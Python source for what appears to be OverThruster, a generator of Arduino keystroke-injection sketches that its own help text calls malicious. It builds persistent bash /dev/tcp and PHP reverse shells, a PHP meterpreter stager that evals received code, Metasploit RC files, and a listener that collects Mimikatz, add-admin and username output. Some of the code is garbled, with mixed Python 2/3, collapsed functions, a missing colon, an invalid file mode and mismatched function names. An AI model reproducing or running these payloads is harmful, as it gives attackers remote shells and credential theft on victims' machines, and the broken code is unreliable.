def helperMenu():
menu = {}
menu['1']="Invoke-Mimikatz/Add Admin/UserName and PCname Listener"
menu['42']="Main Menu"
menu['99']= "Exit"
while True:
HelperBanner()
options=menu.keys()
options.sort(key=int)
for entry in options:
print entry, menu[entry]
selection=raw_input("\nPlease Select: ")
if selection =='1':
helperOption1()
elif selection == '2':
helperOption2()
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
else:
print "\n\n***That is not a valid option!***\n\n"
def LinuxMenu():
coreUtils.clearScreen()
menu = {}
menu['1']="Bash Reverse Shell without nc -e for Linux"
menu['2']="Reverse Shell in PHP for Linux"
menu['3']="meterpreter/reverse in PHP for Linux"
menu['42']="Main Menu"
menu['99']="Exit"
while True:
nixBanner()
options=list(menu.keys())
options.sort(key=int)
for entry in options:
print(entry, menu[entry])
selection=input("\nPlease Select: ")
if selection =='1':
nixOption1()
elif selection == '2':
nixOption2()
elif selection == '3':
nixOption3()
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
else:
print("\n\n***That is not a valid option!***\n\n")
def generalInfo():
coreUtils.clearScreen()
print("\n\n")
print("GENERAL")
print(
"OverThruster is designed to facilitate creating Arduino sketches for devices with the AtMega32U4 chipset"
)
print(
"That can do keyboard emulation. Once plugged into a system, the malicious device will type out the contents"
)
print(
"of the selected payload, which include download and execute binaries, custom powershell execution and more"
)
print(
"Options include notification bubbles from system tray to distract users as well as UAC Bypass techniques"
)
print("to get CMD prompts with elevated priveleges")
print("\nREQUIREMENTS")
print(
"This tool requires the HID-Project library for all Windows payloads")
print(
"Which can be installed within the Arduino IDE: Sketch->.Include Library->manage Libraries and search for \"HID-Project\""
)
print("\nABOUT ME")
print("You can find me on twitter at @bhohenadel")
print("and on github at https://github.com/RedLectroid")
print("Thanks to: @loneferret and @mycurial for...alot")
print("\n")
input("Please press Enter to return to the previous screen")
def osxWriteFile(fileName, payloadFunc, payload):
buffer = "#include <Keyboard.h>\n"
buffer += "void setup() {\n"
buffer += " Keyboard.begin();\n"
buffer += " openTerminal();\n"
buffer += " delay(1500);\n"
buffer += " " + payloadFunc
buffer += " closeTerminal();\n"
buffer += " Keyboard.end();\n"
buffer += "}\n"
buffer += "void pressEnter(){\n"
buffer += " Keyboard.press(KEY_RETURN);\n"
buffer += " delay(100);\n"
buffer += " Keyboard.release(KEY_RETURN);\n"
buffer += "}\n"
buffer += "void openTerminal(){\n"
buffer += " delay(500);\n"
buffer += " Keyboard.press(KEY_LEFT_GUI);\n"
buffer += " Keyboard.println(\" \");\n"
buffer += " delay(150);\n"
buffer += " Keyboard.release(KEY_LEFT_GUI);\n"
buffer += " delay(100);\n"
buffer += " Keyboard.println(\"terminal\");\n"
buffer += " delay(100);\n"
buffer += " pressEnter();\n"
buffer += " pressEnter();\n"
buffer += " delay(500);\n"
buffer += "}\n"
buffer += "\n"
buffer += "void closeTerminal(){\n"
buffer += " Keyboard.press(KEY_LEFT_GUI);\n"
buffer += " Keyboard.println(\"w\");\n"
buffer += " delay(150);\n"
buffer += " Keyboard.release(KEY_LEFT_GUI);\n"
buffer += " delay(100);\n"
buffer += " pressEnter();\n"
buffer += "}\n"
buffer += "\n"
buffer += payload
buffer += "void loop()\n"
buffer += "{\n"
buffer += "}\n"
fileName = coreUtils.checkINO(fileName)
file = open(fileName, 'm')
file.write(buffer)
file.close()
print "\n\noutput written to " + fileName
raw_input("\nPress Enter to continue and return to Main Menu...")
coreUtils.clearScreen()
def HelperBanner(): coreUtils.clearScreen() print "********************************************************************************************" print "* *" print "* *" print "* Helper Function *" print "* These options open up various listeners for the payloads *" print "* *" print "********************************************************************************************" print "\n"
def nixBanner():
coreUtils.clearScreen()
print("********************************************************************************************")
print("* *")
print("* *")
print("* Linux Payloads *")
print("* These Payloads are made for linux, it's up to you to get a terminal open *")
print("* *")
print("********************************************************************************************")
print("\n")
def osxBanner():
coreUtils.clearScreen()
print "********************************************************************************************"
print "* *"
print "* *"
print "* OSX Payloads *"
print "* These Payloads are for OSX *"
print "* *"
print "********************************************************************************************"
print "\n"
def listenerMode():
listener=""
while True:
coreUtils.clearScreen()
print "This menu will let you select which mode the listener will be on"
print "This option will decide the naming convention for the ouput files"
print "Please select 1 or 2, then select to return to the previous menu"
print "\n"
menu = {}
menu['1'] = "Set listener to Mimikatz"
menu['2'] = "Set listener to Add Admin"
menu['3'] = "Set listener to UserName and Computer Name"
menu['42'] = "Back to previous menu"
menu['99'] = "Exit"
options=menu.keys()
options.sort(key=int)
for entry in options:
print entry, menu[entry]
print "\n\n"
selection = raw_input("Please select a mode: ")
if selection == '1':
listener = "MimiKatz"
elif selection == '2':
listener = "addAdmin"
elif selection == '3':
listener = "userPCname"
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
else:
print "\n\n***That is not a valid option!***\n\n"
return listener
def helperOption1():
done = False
looper = False
port=""
listener=""
while looper != True:
coreUtils.clearScreen()
print "********************************************************************************************"
print "* *"
print "* Listner *"
print "* This helper listens on a specific port and write the relevant data to a file *"
print "* Options are: 1.Listening Port *"
print "* *"
print "********************************************************************************************"
print "\n"
menu = {}
menu['1'] = "Set the listening port"
menu['2'] = "Set listener to mimikatz, Admin or User and PC Name mode"
menu['3'] = "Start the listener"
menu['42']= "Return to previous menu"
menu['99']= "Exit"
options=menu.keys()
options.sort(key=int)
for entry in options:
print entry, menu[entry]
print "\n\n"
if port != "":
print "Listening port this server set to -> " + port
if listener !="":
print "Listner Mode set to " + listener + " mode"
selection=raw_input("\nPlease Select: ")
if selection == '1':
port = raw_input("Please enter the listening port on this server: ")
elif selection == '2':
listener = listenerMode()
elif selection == '3':
if done == False:
print "\nYou have not set all the options"
raw_input("Press Enter to return to the menu and set all the options")
else:
looper = True
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
else:
print "\n\n***That is not a valid option!***\n\n"
if port != "" and listener != "":
done = True
if listener == 'MimiKatz':
fileExtention = '-mimiKatz'
elif listener == 'addAdmin':
fileExtention = '-addAdmin'
elif listener == 'userPCname'
fileExtention = '-userPCname'
if done == True and looper == True:
port = int(port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('', port)
sock.bind(server_address)
sock.listen(1)
while True:
try:
print "Listening for a connection..."
connection, client_address = sock.accept()
print 'connection from', client_address[0]
data = connection.recv(4096)
if not data:
print "no data from " , client_address[0]
connection.close()
break
else:
printData(client_address[0],data, fileExtention)
except KeyboardInterrupt:
if connection:
connection.close()
break
finally:
# Clean up the connection
connection.close()
def nixOption3():
done = False
looper = False
remoteIP=""
remotePort=""
fileName=""
RCfile=""
while looper != True:
coreUtils.clearScreen()
print("********************************************************************************************")
print("* *")
print("* PHP Meterpreter Reverse TCP *")
print("* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *")
print("* Options are: 1. remote IP 2. Listening Port *")
print("* *")
print("********************************************************************************************")
print("\n")
menu = {}
menu['0'] = "Info"
menu['1'] = "Set IP address of the remote server"
menu['2'] = "Set the listening port of the remote server"
menu['3'] = "Set Arduino sketch filename"
menu['4'] = "Set Metasploit RC File name"
menu['5'] = "Write Arduino sketch"
menu['42']= "Return to previous menu"
menu['99']= "Exit"
options=list(menu.keys())
options.sort(key=int)
for entry in options:
print(entry, menu[entry])
print("\n\n")
if remoteIP != "":
print("IP of the remote server set to -> " + remoteIP)
if remotePort != "":
print("Listening port on the remote server set to -> " + remotePort)
if RCfile != "":
print("Metasploit RC File name set to -> " + RCfile)
if fileName != "":
print("Arduino filename set to -> " + fileName)
selection=input("\nPlease Select: ")
if selection =='1':
remoteIP = input("Please enter the IP address of the remote server to connect to: ")
elif selection == '2':
remotePort = input("Please enter the listening port on the remote server:")
elif selection == '3':
RCfile = coreUtils.getRCFileName('reverseMetPHP.rc')
elif selection == '4':
fileName = coreUtils.getFileName('reverseMetPHP.ino')
elif selection == '5':
if done == False:
print("\nYou have not set all the options")
input("Press Enter to return to the menu and set all the options")
else:
looper = True
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
elif selection == '0':
nfoCore.nix3info()
else:
print("\n\n***That is not a valid option!***\n\n")
if remoteIP != "" and remotePort != "" and fileName != "" and RCfile !="":
done = True
if done == True and looper == True:
payload = "void ReverseShell(){\n"
payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");"
payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))"
payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");"
payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];"
payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;"
payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n"
payload += " pressEnter();\n"
payload += "}\n"
payloadFunc = "ReverseShell();\n"
nixWriteFile(fileName,payloadFunc, payload)
coreUtils.msfRCfile(remoteIP,remotePort,'php/meterpreter/reverse_tcp',RCfile)
def nixOption2():
done = False
looper = False
remoteIP=""
remotePort=""
fileName=""
while looper != True:
coreUtils.clearScreen()
print("********************************************************************************************")
print("* *")
print("* PHP Reverse Shell *")
print("* This payload will initiate a reverse shell via PHP, requires PHP *")
print("* Options are: 1. remote IP 2. Listening Port *")
print("* *")
print("********************************************************************************************")
print("\n")
menu = {}
menu['0'] = "Info"
menu['1'] = "Set IP address of the remote server"
menu['2'] = "Set the listening port of the remote server"
menu['3'] = "Set Arduino sketch filename"
menu['4'] = "Write Arduino sketch"
menu['42']= "Return to previous menu"
menu['99']= "Exit"
options=list(menu.keys())
options.sort(key=int)
for entry in options:
print(entry, menu[entry])
print("\n\n")
if remoteIP != "":
print("IP of the remote server set to -> " + remoteIP)
if remotePort != "":
print("Listening port on the remote server set to -> " + remotePort)
if fileName != "":
print("Arduino filename set to -> " + fileName)
selection=input("\nPlease Select: ")
if selection =='1':
remoteIP = input("Please enter the IP address of the remote server to connect to: ")
elif selection == '2':
remotePort = input("Please enter the listening port on the remote server:")
elif selection == '3':
fileName = coreUtils.getFileName('revShellPHP.ino')
elif selection == '4':
if done == False:
print("\nYou have not set all the options")
input("Press Enter to return to the menu and set all the options")
else:
looper = True
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
elif selection == '0':
nfoCore.nix2info()
else:
print("\n\n***That is not a valid option!***\n\n")
if remoteIP != "" and remotePort != "" and fileName != "":
done = True
if done == True and looper == True:
payload = "void ReverseShell(){\n"
payload += "Keyboard.println(\"php -r '$sock=fsockopen(\\\""+remoteIP+"\\\","+remotePort+");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n"
payload += " pressEnter();\n"
payload += "}\n"
payloadFunc = "ReverseShell();\n"
nixWriteFile(fileName,payloadFunc, payload)
def NixOption1():
done = False
looper = False
remoteIP=""
remotePort=""
fileName=""
while looper != True:
coreUtils.clearScreen()
print("********************************************************************************************")
print("* *")
print("* Bash Reverse Shell without NetCat *")
print("* This payload will initiate a Bash reverse shell without Netcat *")
print("* Options are: 1. remote IP 2. Listening Port *")
print("* *")
print("********************************************************************************************")
print("\n")
menu = {}
menu['0'] = "Info"
menu['1'] = "Set IP address of the remote server"
menu['2'] = "Set the listening port of the remote server"
menu['3'] = "Set Arduino sketch filename"
menu['4'] = "Write Arduino sketch"
menu['42']= "Return to previous menu"
menu['99']= "Exit"
options=list(menu.keys())
options.sort(key=int)
for entry in options:
print(entry, menu[entry])
print("\n\n")
if remoteIP != "":
print("IP of the remote server set to -> " + remoteIP)
if remotePort != "":
print("Listening port on the remote server set to -> " + remotePort)
if fileName != "":
print("Arduino filename set to -> " + fileName)
selection=input("\nPlease Select: ")
if selection =='1':
remoteIP = input("Please enter the IP address of the remote server to connect to: ")
elif selection == '2':
remotePort = input("Please enter the listening port on the remote server:")
elif selection == '3':
fileName = coreUtils.getFileName('reverseCMD.ino')
elif selection == '4':
if done == False:
print("\nYou have not set all the options")
input("Press Enter to return to the menu and set all the options")
else:
looper = True
elif selection == '42':
coreUtils.clearScreen()
break
elif selection == '99':
exit()
elif selection == '0':
nfoCore.nix1info()
else:
print("\n\n***That is not a valid option!***\n\n")
if remoteIP != "" and remotePort != "" and fileName != "":
done = True
if done == True and looper == True:
payload = "void ReverseShell(){\n"
payload += "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" +remoteIP+ "/" +remotePort+ " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n"
payload += " pressEnter();\n"
payload += "}\n"
payloadFunc = "ReverseShell();\n"
nixWriteFile(fileName,payloadFunc, payload)
